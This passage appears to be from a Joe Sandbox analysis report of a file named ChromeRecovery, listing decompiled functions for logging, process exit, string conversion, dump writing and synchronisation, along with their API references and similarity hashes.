				_t17 = __ebx;
				_t22 = __ecx;
				_t26 =  *((char*)(__ecx + 8));
				if( *((char*)(__ecx + 8)) != 0) {
					L10:
					return _t13;
				} else {
					 *((char*)(__ecx + 8)) = 1;
					_t13 = E00C740DE(__ecx, _t26);
					if( *(_t22 + 0x10) == 0) {
						goto L10;
					} else {
						if(_t13 != 0) {
							 *((char*)(_t22 + 0xa)) = 1;
						}
						_t14 = E00C7470B(_t22);
						_t29 = _t14;
						if(_t14 != 0) {
							_t13 = E00C741A3(_t17, _t22, _t21, _t22, __eflags);
							__eflags =  *(_t22 + 0x18);
							if(__eflags == 0) {
								_push( *((intOrPtr*)(_t22 + 0x14)));
								_push( *((intOrPtr*)(_t22 + 0x1c)));
								_push(L"LOG_SYSTEM: [%s]: Could not create logging file %s\n");
								_t13 = E00C76CB8(__eflags);
								OutputDebugStringW(_t13);
							}
							__eflags =  *(_t22 + 0x10);
							 *((char*)(_t22 + 9)) = 1;
							if( *(_t22 + 0x10) != 0) {
								return ReleaseMutex( *(_t22 + 0x10));
							}
							goto L10;
						} else {
							_push( *((intOrPtr*)(_t22 + 0xc)));
							_push( *((intOrPtr*)(_t22 + 0x1c)));
							_push(L"LOG_SYSTEM: [%s]: Could not acquire logging mutex %s\n");
							_t16 = E00C76CB8(_t29);
							OutputDebugStringW(_t16);
							return _t16;
						}
					}
				}
			}

0x00c7402f
0x00c7402f
0x00c74030
0x00c74032
0x00c74036
0x00c740b1
0x00c740b1
0x00c74038
0x00c74038
0x00c7403c
0x00c74045
0x00000000
0x00c74047
0x00c74049
0x00c7404b
0x00c7404b
0x00c74051
0x00c74056
0x00c74058
0x00c74078
0x00c7407d
0x00c74081
0x00c74083
0x00c74086
0x00c74089
0x00c7408e
0x00c74097
0x00c74097
0x00c7409d
0x00c740a1
0x00c740a5
0x00000000
0x00c740aa
0x00000000
0x00c7405a
0x00c7405a
0x00c7405d
0x00c74060
0x00c74065
0x00c7406e
0x00c74075
0x00c74075
0x00c74058
0x00c74045

APIs

Part of subcall function 00C740DE: GetLastError.KERNEL32 ref: 00C74173

OutputDebugStringW.KERNEL32 ref: 00C7406E

Part of subcall function 00C741A3: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000000,00000080,00000000), ref: 00C74219

ReleaseMutex.KERNEL32(00000000), ref: 00C740AA

Part of subcall function 00C76CB8: wvsprintfW.USER32(00000000,00000000,00000001), ref: 00C76D50

OutputDebugStringW.KERNEL32 ref: 00C74097

Strings

LOG_SYSTEM: [%s]: Could not create logging file %s, xrefs: 00C74089
LOG_SYSTEM: [%s]: Could not acquire logging mutex %s, xrefs: 00C74060

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugOutputString$CreateErrorFileLastMutexReleasewvsprintf
String ID: LOG_SYSTEM: [%s]: Could not acquire logging mutex %s$LOG_SYSTEM: [%s]: Could not create logging file %s
API String ID: 1265178759-2023621912
Opcode ID: 6fc4ad287483100b7ab64f3624c63bcdfb076d0aa1b5ae4cf7ffcad7f42ac19f
Instruction ID: 6d58fccc43aa54b358bcc14f0dfa9927a1f25e40c0b058c61556f163fec16e27
Opcode Fuzzy Hash: 6fc4ad287483100b7ab64f3624c63bcdfb076d0aa1b5ae4cf7ffcad7f42ac19f
Instruction Fuzzy Hash: 11018431504B40DFDF3A6B74A809B4A7BE1AF11308F04C94CF5AE11562D7B69698D792

Uniqueness

Uniqueness Score: -1.00%

Function 00C83E8E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00C83E8E(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0xca8008; // 0x617e0cdd
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0xc9644d, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0xc97348(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x00c83ea3
0x00c83eae
0x00c83eb4
0x00c83eb8
0x00c83ec3
0x00c83ecb
0x00c83ed5
0x00c83edb
0x00c83edf
0x00c83ee6
0x00c83eec
0x00c83eec
0x00c83edf
0x00c83ef2
0x00c83ef7
0x00c83ef7
0x00c83f00
0x00c83f0a

APIs

GetModuleHandleExW.KERNEL32 ref: 00C83EC3
GetProcAddress.KERNEL32 ref: 00C83ED5
FreeLibrary.KERNEL32 ref: 00C83EF7

Strings

mscoree.dll, xrefs: 00C83EBC
CorExitProcess, xrefs: 00C83ECD

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f35a0a770894b8747e0a680f4c488197e748a5893cdbd619e8b48b852f7fc4c3
Instruction ID: 922ec1e280c8cff986ba63efde0292dbec504eaec285b33f991ce7c492bf3eca
Opcode Fuzzy Hash: f35a0a770894b8747e0a680f4c488197e748a5893cdbd619e8b48b852f7fc4c3
Instruction Fuzzy Hash: CF016D31914659ABDB119F90DC09FAFBBB8FB45B54F000626E821A26E0DBB59A04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00C8DB60 Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00C8DB60(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebp;
				signed int _t41;
				intOrPtr _t46;
				signed int _t49;
				void* _t53;
				signed int _t57;
				void* _t63;
				intOrPtr _t65;
				void* _t66;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr* _t92;
				intOrPtr* _t95;
				intOrPtr* _t97;
				signed int _t98;
				void* _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				void* _t105;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0xca8008; // 0x617e0cdd
				_v8 = _t41 ^ _t98;
				_t72 = _a20;
				if(_t72 > 0) {
					_t70 = E00C90DED(_a16, _t72);
					_t105 = _t70 - _t72;
					_t4 = _t70 + 1; // 0x1
					_t72 = _t4;
					if(_t105 >= 0) {
						_t72 = _t70;
					}
				}
				_t76 = _a32;
				if(_a32 == 0) {
					_t69 =  *((intOrPtr*)( *_a4 + 8));
					_t76 = _t69;
					_a32 = _t69;
				}
				_t46 = E00C8A532(_t76, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t72, 0, 0);
				_t100 = _t99 + 0x18;
				_v12 = _t46;
				if(_t46 == 0) {
					L41:
					return E00C7F35B(_v8 ^ _t98);
				} else {
					_t16 = _t46 + _t46 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t46 + _t46 & _t16;
					if(_t49 == 0) {
						_t95 = 0;
						L39:
						_t74 = 0;
						L40:
						E00C8BE40(_t95);
						goto L41;
					}
					if(_t49 > 0x400) {
						_t92 = E00C89617(_t49);
						if(_t92 == 0) {
							L13:
							_t95 = _t92;
							if(_t92 == 0) {
								goto L39;
							}
							_t53 = E00C8A532(_a32, 1, _a16, _t72, _t92, _v12);
							_t102 = _t100 + 0x18;
							if(_t53 == 0) {
								goto L39;
							}
							_t96 = _v12;
							_t74 = E00C8AAE0(_a8, _a12, _t92, _v12, 0, 0, 0, 0, 0);
							if(_t74 == 0) {
								L19:
								_t95 = _t92;
								goto L39;
							}
							if((_a12 & 0x00000400) == 0) {
								_t31 = _t74 + _t74 + 8; // 0x8
								asm("sbb eax, eax");
								_t57 = _t74 + _t74 & _t31;
								if(_t57 == 0) {
									_t97 = 0;
									L37:
									E00C8BE40(_t97);
									goto L19;
								}
								if(_t57 > 0x400) {
									_t97 = E00C89617(_t57);
									if(_t97 == 0) {
										goto L37;
									}
									 *_t97 = 0xdddd;
									L28:
									_t97 = _t97 + 8;
									if(_t97 == 0 || E00C8AAE0(_a8, _a12, _t92, _v12, _t97, _t74, 0, 0, 0) == 0) {
										goto L37;
									} else {
										_push(0);
										_push(0);
										if(_a28 != 0) {
											_push(_a28);
											_push(_a24);
										} else {
											_push(0);
											_push(0);
										}
										_push(_t74);
										_push(_t97);
										_push(0);
										_push(_a32);
										_t63 = E00C8A5AE();
										_t74 = _t63;
										if(_t63 == 0) {
											goto L37;
										} else {
											E00C8BE40(_t97);
											L34:
											_t95 = _t92;
											goto L40;
										}
									}
								}
								E00C93B80();
								_t97 = _t102;
								if(_t97 == 0) {
									goto L37;
								}
								 *_t97 = 0xcccc;
								goto L28;
							}
							_t65 = _a28;
							if(_t65 == 0) {
								goto L34;
							}
							if(_t74 <= _t65) {
								_t66 = E00C8AAE0(_a8, _a12, _t92, _t96, _a24, _t65, 0, 0, 0);
								_t74 = _t66;
								if(_t66 != 0) {
									goto L34;
								}
							}
							goto L19;
						}
						 *_t92 = 0xdddd;
						L12:
						_t92 = _t92 + 8;
						goto L13;
					}
					E00C93B80();
					_t92 = _t100;
					if(_t92 == 0) {
						goto L13;
					}
					 *_t92 = 0xcccc;
					goto L12;
				}
			}

0x00c8db65
0x00c8db66
0x00c8db67
0x00c8db6e
0x00c8db72
0x00c8db79
0x00c8db7f
0x00c8db85
0x00c8db88
0x00c8db88
0x00c8db8b
0x00c8db8d
0x00c8db8d
0x00c8db8b
0x00c8db8f
0x00c8db94
0x00c8db9b
0x00c8db9e
0x00c8dba0
0x00c8dba0
0x00c8dbbc
0x00c8dbc1
0x00c8dbc4
0x00c8dbc9
0x00c8dd3c
0x00c8dd4d
0x00c8dbcf
0x00c8dbd1
0x00c8dbd6
0x00c8dbd8
0x00c8dbda
0x00c8dd2f
0x00c8dd31
0x00c8dd31
0x00c8dd33
0x00c8dd34
0x00000000
0x00c8dd3a
0x00c8dbe5
0x00c8dc00
0x00c8dc05
0x00c8dc10
0x00c8dc10
0x00c8dc14
0x00000000
0x00000000
0x00c8dc27
0x00c8dc2c
0x00c8dc31
0x00000000
0x00000000
0x00c8dc37
0x00c8dc4e
0x00c8dc52
0x00c8dc6d
0x00c8dc6d
0x00000000
0x00c8dc6d
0x00c8dc5c
0x00c8dc99
0x00c8dc9e
0x00c8dca0
0x00c8dca2
0x00c8dd21
0x00c8dd23
0x00c8dd24
0x00000000
0x00c8dd29
0x00c8dca6
0x00c8dcc1
0x00c8dcc6
0x00000000
0x00000000
0x00c8dcc8
0x00c8dcce
0x00c8dcce
0x00c8dcd3
0x00000000
0x00c8dcef
0x00c8dcf1
0x00c8dcf2
0x00c8dcf6
0x00c8dd19
0x00c8dd1c
0x00c8dcf8
0x00c8dcf8
0x00c8dcf9
0x00c8dcf9
0x00c8dcfa
0x00c8dcfb
0x00c8dcfc
0x00c8dcfd
0x00c8dd00
0x00c8dd05
0x00c8dd0c
0x00000000
0x00c8dd0e
0x00c8dd0f
0x00c8dd15
0x00c8dd15
0x00000000
0x00c8dd15
0x00c8dd0c
0x00c8dcd3
0x00c8dca8
0x00c8dcad
0x00c8dcb1
0x00000000
0x00000000
0x00c8dcb3
0x00000000
0x00c8dcb3
0x00c8dc5e
0x00c8dc63
0x00000000
0x00000000
0x00c8dc6b
0x00c8dc85
0x00c8dc8a
0x00c8dc8e
0x00000000
0x00000000
0x00c8dc94
0x00000000
0x00c8dc6b
0x00c8dc07
0x00c8dc0d
0x00c8dc0d
0x00000000
0x00c8dc0d
0x00c8dbe7
0x00c8dbec
0x00c8dbf0
0x00000000
0x00000000
0x00c8dbf2
0x00000000
0x00c8dbf2

APIs

__alloca_probe_16.LIBCMT ref: 00C8DBE7
__alloca_probe_16.LIBCMT ref: 00C8DCA8
__freea.LIBCMT ref: 00C8DD0F

Part of subcall function 00C89617: RtlAllocateHeap.NTDLL(00000000,00C8A030,?,?,00C8A030,00000220,?,?,?), ref: 00C89649

__freea.LIBCMT ref: 00C8DD24
__freea.LIBCMT ref: 00C8DD34

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 5cc24568c9b68d6efab3b4f66e609a3dbb92229d80387f7ca0ab6e66f2b194ba
Instruction ID: 5b2dd177a067e7db64f3947e1ba54618fb5fd7e9b5bac5912d0764a46bcf5582
Opcode Fuzzy Hash: 5cc24568c9b68d6efab3b4f66e609a3dbb92229d80387f7ca0ab6e66f2b194ba
Instruction Fuzzy Hash: E551E17260020A6FEF24AF65CC81EBF77A9EB04358B150129FC16D7180EB70CE10D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00C7EA19 Relevance: 7.7, APIs: 5, Instructions: 157
filethreadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00C7EA19(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, void* _a16) {
				signed int _v12;
				void* _v24;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				char* _v48;
				long _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				signed int _v68;
				void* _v72;
				char* _v76;
				char _v80;
				long _v84;
				intOrPtr _v88;
				void* _v92;
				char _v116;
				struct _MEMORY_BASIC_INFORMATION _v144;
				void* __ebp;
				signed int _t74;
				void* _t79;
				signed int _t82;
				intOrPtr* _t83;
				long _t85;
				signed int _t88;
				void* _t94;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t99;
				signed int _t100;
				void* _t103;
				void* _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t111;
				intOrPtr _t119;
				void* _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				signed int _t131;
				void* _t134;
				void* _t135;
				void* _t136;
				signed int _t137;
				void* _t145;
				void* _t147;

				_t74 =  *0xca8008; // 0x617e0cdd
				_v12 = _t74 ^ _t137;
				_t131 = _a8;
				_t103 = 0;
				_t127 = __ecx;
				_v68 = _t131;
				_v40 = __ecx;
				_v44 = _a16;
				if( *((intOrPtr*)(__ecx + 0x68)) != 0) {
					_t79 = CreateFileW( *(__ecx + 0x60), 0x40000000, 0, 0, 1, 0x80, 0);
					_v72 = _t79;
					if(_t79 != 0xffffffff) {
						_v92 = _a4;
						_v88 = _t131;
						_v84 = 0;
						_v52 = 0;
						_v48 =  &_v116;
						_v32 = 3;
						GetCurrentThreadId();
						_t109 = _v52;
						_t82 = _t109 * 0xc;
						_t110 = _t109 + 1;
						_v52 = _t110;
						 *((intOrPtr*)(_t137 + _t82 - 0x68)) =  &_v32;
						_t124 = _a12;
						 *((intOrPtr*)(_t137 + _t82 - 0x70)) = 0x47670001;
						 *((intOrPtr*)(_t137 + _t82 - 0x6c)) = 0xc;
						if(_t124 != 0) {
							_t100 = _t110 * 0xc;
							 *((intOrPtr*)(_t137 + _t100 - 0x70)) = 0x47670002;
							 *((intOrPtr*)(_t137 + _t100 - 0x6c)) = 0x308;
							 *((intOrPtr*)(_t137 + _t100 - 0x68)) = _t124;
							_v52 = _t110 + 1;
						}
						if(_t131 != 0) {
							_t135 =  *( *((intOrPtr*)(_t131 + 4)) + 0xb8);
							_v24 = _t135;
							if(VirtualQueryEx(_v44, _t135,  &_v144, 0x1c) != 0 && _v144.State == 0x1000) {
								_t94 = _v144.BaseAddress;
								_t136 = _t135 + 0xffffff80;
								_t119 = _t103;
								asm("cdq");
								asm("adc ecx, 0xffffffff");
								_v64 = _t124;
								_t145 = _t124 - _t119;
								if(_t145 > 0 || _t145 >= 0 && _t94 >= _t136) {
									_t136 = _t94;
								} else {
									_t124 = _t119;
								}
								_t121 = _v144.RegionSize + _t94;
								_t95 = 0;
								asm("adc eax, [ebp-0x3c]");
								_v36 = _t95;
								_t97 = _v24 + 0x80;
								asm("adc edi, ebx");
								_t147 = _v36 - _t103;
								_t127 = _v40;
								if(_t147 > 0 || _t147 >= 0 && _t121 >= _t97) {
									_t121 = _t97;
								}
								_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0xc0))));
								 *(_t99 + 8) = _t136;
								 *((intOrPtr*)(_t99 + 0xc)) = _t124;
								 *((intOrPtr*)(_t99 + 0x10)) = _t121 - _t136;
							}
						}
						_t111 =  *((intOrPtr*)(_t127 + 0xc0));
						_v60 = _t103;
						_t83 =  *_t111;
						_v60 = _t83;
						_v56 = _t111;
						if(( *(_t83 + 8) |  *(_t83 + 0xc)) == 0) {
							_v60 =  *_t83;
						}
						_t104 = _v44;
						_v80 = E00C7E9B3;
						_v76 =  &_v60;
						_t85 = GetProcessId(_t104);
						asm("sbb ecx, ecx");
						_t134 = _v72;
						_t88 =  ~( *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x68))))(_t104, _t85, _t134,  *((intOrPtr*)(_v40 + 0x6c)),  ~_v68 &  &_v92,  &_v52,  &_v80) - 1);
						asm("sbb al, al");
						_t72 = _t88 + 1; // 0x0
						_t103 = _t72;
						CloseHandle(_t134);
					}
				}
				return E00C7F35B(_v12 ^ _t137);
			}

0x00c7ea22
0x00c7ea29
0x00c7ea31
0x00c7ea34
0x00c7ea37
0x00c7ea39
0x00c7ea3c
0x00c7ea3f
0x00c7ea45
0x00c7ea5d
0x00c7ea63
0x00c7ea69
0x00c7ea75
0x00c7ea78
0x00c7ea7b
0x00c7ea7e
0x00c7ea81
0x00c7ea84
0x00c7ea8b
0x00c7ea91
0x00c7ea97
0x00c7ea9a
0x00c7ea9b
0x00c7ea9e
0x00c7eaa2
0x00c7eaa5
0x00c7eaad
0x00c7eab7
0x00c7eab9
0x00c7eabc
0x00c7eac4
0x00c7eacc
0x00c7ead3
0x00c7ead3
0x00c7ead8
0x00c7eae3
0x00c7eaf4
0x00c7eaff
0x00c7eb0a
0x00c7eb10
0x00c7eb13
0x00c7eb15
0x00c7eb16
0x00c7eb19
0x00c7eb1c
0x00c7eb1e
0x00c7eb2a
0x00c7eb26
0x00c7eb26
0x00c7eb26
0x00c7eb31
0x00c7eb35
0x00c7eb36
0x00c7eb39
0x00c7eb3f
0x00c7eb44
0x00c7eb46
0x00c7eb49
0x00c7eb4c
0x00c7eb54
0x00c7eb54
0x00c7eb5e
0x00c7eb60
0x00c7eb63
0x00c7eb66
0x00c7eb66
0x00c7eaff
0x00c7eb69
0x00c7eb6f
0x00c7eb72
0x00c7eb74
0x00c7eb77
0x00c7eb80
0x00c7eb84
0x00c7eb84
0x00c7eb8d
0x00c7eb97
0x00c7eb9e
0x00c7eba1
0x00c7ebb7
0x00c7ebbd
0x00c7ebc6
0x00c7ebc9
0x00c7ebcb
0x00c7ebcb
0x00c7ebce
0x00c7ebce
0x00c7ea69
0x00c7ebe4

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 00C7EA5D
GetCurrentThreadId.KERNEL32 ref: 00C7EA8B
VirtualQueryEx.KERNEL32 ref: 00C7EAF7
GetProcessId.KERNEL32 ref: 00C7EBA1
CloseHandle.KERNEL32 ref: 00C7EBCE

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CloseCreateCurrentFileHandleProcessQueryThreadVirtual
String ID:
API String ID: 1837238986-0
Opcode ID: b2e96a475cf665ef0affe3ee0092244a822db856633ff51a7ff144bd69b258b2
Instruction ID: 967c99eb63a4e73f9b25860330bcf84d010d6072b49e2400463d1cf35a141c38
Opcode Fuzzy Hash: b2e96a475cf665ef0affe3ee0092244a822db856633ff51a7ff144bd69b258b2
Instruction Fuzzy Hash: 4A512971E102199FDF14CFA8D884AEDBBB5FF48314F1482AAE81AA7390D770A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00C72C7E Relevance: 7.6, APIs: 5, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C72C7E(void* __ecx) {
				int _v8;
				int _v12;
				short _v16;
				void* _v20;
				void* _v24;
				struct _ACL* _v28;
				struct _ACL* _v32;
				void* _t33;
				void* _t37;
				void* _t62;

				_t62 = __ecx;
				if( *(__ecx + 4) == 0) {
					return _t33;
				}
				_v16 = _v16 & 0x00000000;
				if(GetSecurityDescriptorControl( *(__ecx + 4),  &_v16,  &_v32) != 0 && (_v16 & 0x00008000) == 0) {
					GetSecurityDescriptorOwner( *(_t62 + 4),  &_v20,  &_v8);
					E00C83557(_v20);
					GetSecurityDescriptorGroup( *(_t62 + 4),  &_v24,  &_v8);
					E00C83557(_v24);
					GetSecurityDescriptorDacl( *(_t62 + 4),  &_v12,  &_v28,  &_v8);
					if(_v12 != 0) {
						E00C83557(_v28);
					}
					GetSecurityDescriptorSacl( *(_t62 + 4),  &_v12,  &_v32,  &_v8);
					if(_v12 != 0) {
						E00C83557(_v32);
					}
				}
				_t37 = E00C83557( *(_t62 + 4));
				 *(_t62 + 4) =  *(_t62 + 4) & 0x00000000;
				return _t37;
			}

0x00c72c85
0x00c72c8b
0x00c72d42
0x00c72d42
0x00c72c91
0x00c72ca8
0x00c72cc2
0x00c72ccb
0x00c72cdc
0x00c72ce5
0x00c72cfa
0x00c72d04
0x00c72d09
0x00c72d0e
0x00c72d1e
0x00c72d28
0x00c72d2d
0x00c72d32
0x00c72d28
0x00c72d36
0x00c72d3b
0x00000000

APIs

GetSecurityDescriptorControl.ADVAPI32 ref: 00C72CA0
GetSecurityDescriptorOwner.ADVAPI32 ref: 00C72CC2
GetSecurityDescriptorGroup.ADVAPI32 ref: 00C72CDC
GetSecurityDescriptorDacl.ADVAPI32(00000000,?,?,00C75C00), ref: 00C72CFA
GetSecurityDescriptorSacl.ADVAPI32 ref: 00C72D1E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DescriptorSecurity$ControlDaclGroupOwnerSacl
String ID:
API String ID: 1158139820-0
Opcode ID: 111abe60c05cd438858279b43306ca3c986b3e270759a397fca7f04704b280ed
Instruction ID: 4db154765ea30106eb9d9f03d99fdd12b945625091440a966ad15e55f5c0b3f4
Opcode Fuzzy Hash: 111abe60c05cd438858279b43306ca3c986b3e270759a397fca7f04704b280ed
Instruction Fuzzy Hash: 45212C72800108EFDB12EBD0DD49BEFB7BCEF04701F108566E526A10A0DB70AB58DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E8C1 Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E8C1(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				long* _t20;
				struct _CRITICAL_SECTION* _t22;
				void* _t23;

				_t23 = __ecx;
				_t22 = __ecx + 0x90;
				EnterCriticalSection(_t22);
				_t20 = 0;
				if( *((intOrPtr*)(_t23 + 0x88)) != 0) {
					 *((intOrPtr*)(_t23 + 0xb0)) = GetCurrentThreadId();
					 *((intOrPtr*)(_t23 + 0xb4)) = _a4;
					 *((intOrPtr*)(_t23 + 0xb8)) = _a8;
					ReleaseSemaphore( *(_t23 + 0xa8), 1, 0);
					WaitForSingleObject( *(_t23 + 0xac), 0xffffffff);
					 *((intOrPtr*)(_t23 + 0xb0)) = 0;
					 *((intOrPtr*)(_t23 + 0xb4)) = 0;
					 *((intOrPtr*)(_t23 + 0xb8)) = 0;
					_t20 =  *((intOrPtr*)(_t23 + 0xbc));
				}
				LeaveCriticalSection(_t22);
				return _t20;
			}

0x00c7e8c6
0x00c7e8c9
0x00c7e8d0
0x00c7e8d6
0x00c7e8de
0x00c7e8e7
0x00c7e8f8
0x00c7e901
0x00c7e907
0x00c7e915
0x00c7e91b
0x00c7e921
0x00c7e927
0x00c7e92d
0x00c7e92d
0x00c7e934
0x00c7e940

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000001,?,00C7E610,?,00000000), ref: 00C7E8D0
GetCurrentThreadId.KERNEL32 ref: 00C7E8E0
ReleaseSemaphore.KERNEL32 ref: 00C7E907
WaitForSingleObject.KERNEL32 ref: 00C7E915
LeaveCriticalSection.KERNEL32(?,?,00C7E610,?,00000000), ref: 00C7E934

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveObjectReleaseSemaphoreSingleThreadWait
String ID:
API String ID: 3216651733-0
Opcode ID: 653da1b1df2af68527e8540b7884fa5a1c5ba77d287dafb0f3901005ff3737dc
Instruction ID: cab5827a9c6815e7742bab25a5d1c875e16e221b7868c747294243bbd52f129e
Opcode Fuzzy Hash: 653da1b1df2af68527e8540b7884fa5a1c5ba77d287dafb0f3901005ff3737dc
Instruction Fuzzy Hash: A401E876519700AFD7609F78D888BDABBE9FB09210F00862FF5AE82251C7712444CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00C77B75 Relevance: 7.5, APIs: 5, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00C77B75(void* __ecx, intOrPtr _a4) {
				long _v8;
				void* _t6;
				struct _CRITICAL_SECTION* _t13;

				_push(__ecx);
				_t13 = __ecx + 4;
				if(TryEnterCriticalSection(_t13) != 0) {
					L5:
					_t6 = 1;
				} else {
					_v8 = GetTickCount();
					while(1) {
						Sleep(0);
						if(TryEnterCriticalSection(_t13) != 0) {
							goto L5;
						}
						if(GetTickCount() - _v8 < _a4) {
							continue;
						} else {
							_t6 = 0;
						}
						goto L6;
					}
					goto L5;
				}
				L6:
				return _t6;
			}

0x00c77b78
0x00c77b7a
0x00c77b86
0x00c77bb6
0x00c77bb6
0x00c77b88
0x00c77b8e
0x00c77b91
0x00c77b93
0x00c77ba2
0x00000000
0x00000000
0x00c77bb0
0x00000000
0x00c77bb2
0x00c77bb2
0x00c77bb2
0x00000000
0x00c77bb0
0x00000000
0x00c77b91
0x00c77bb8
0x00c77bba

APIs
